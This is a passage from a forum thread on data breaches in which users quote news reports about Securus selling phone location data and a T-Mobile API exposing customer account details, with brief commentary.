Also: There are three ways to not tell the truth: lies, damned lies, and statistics.
Pyperkub
Posts: 23583
Joined: Mon Dec 13, 2004 5:07 pm
Location: NC- that's Northern California

Re: The Data Breach Thread

Post by Pyperkub »

Securus (phone tracking for marketing and warrantless law enforcement):
Last week, the New York Times reported that Securus obtains phone location data from major telcos, such as AT&T, Sprint, T-Mobile, and Verizon, and then makes this available to its customers. The system by which Securus obtains the data is typically used by marketers, but Securus provides a product for law enforcement to track phones in the US nationwide with little legal oversight, the report adds. In one case, a former sheriff of Mississippi County, Mo., used the Securus service to track other law enforcement officials’ phones, according to court records.

The hacker who breached Securus provided Motherboard with several internal company files. A spreadsheet allegedly from a database marked “police” includes over 2,800 usernames, email addresses, phone numbers, and hashed passwords and security questions of Securus users, stretching from 2011 up to this year.
Black Lives definitely Matter Lorini!

Also: There are three ways to not tell the truth: lies, damned lies, and statistics.
Pyperkub
Posts: 23583
Joined: Mon Dec 13, 2004 5:07 pm
Location: NC- that's Northern California

Re: The Data Breach Thread

Post by Pyperkub »

tmobile api
The returned data included a customer's full name, postal address, billing account number, and in some cases information about tax identification numbers. The data also included customers' account information, such as if a bill is past-due or if the customer had their service suspended.

The data also included references to account PINs used by customers as a security question when contacting phone support. Anyone could use that information to hijack accounts.
Black Lives definitely Matter Lorini!

Also: There are three ways to not tell the truth: lies, damned lies, and statistics.
Lorini
Posts: 8282
Joined: Wed Oct 13, 2004 8:52 am
Location: Santa Clarita, California

Re: The Data Breach Thread

Post by Lorini »

That's just stupid and thoughtless.
Black Lives Matter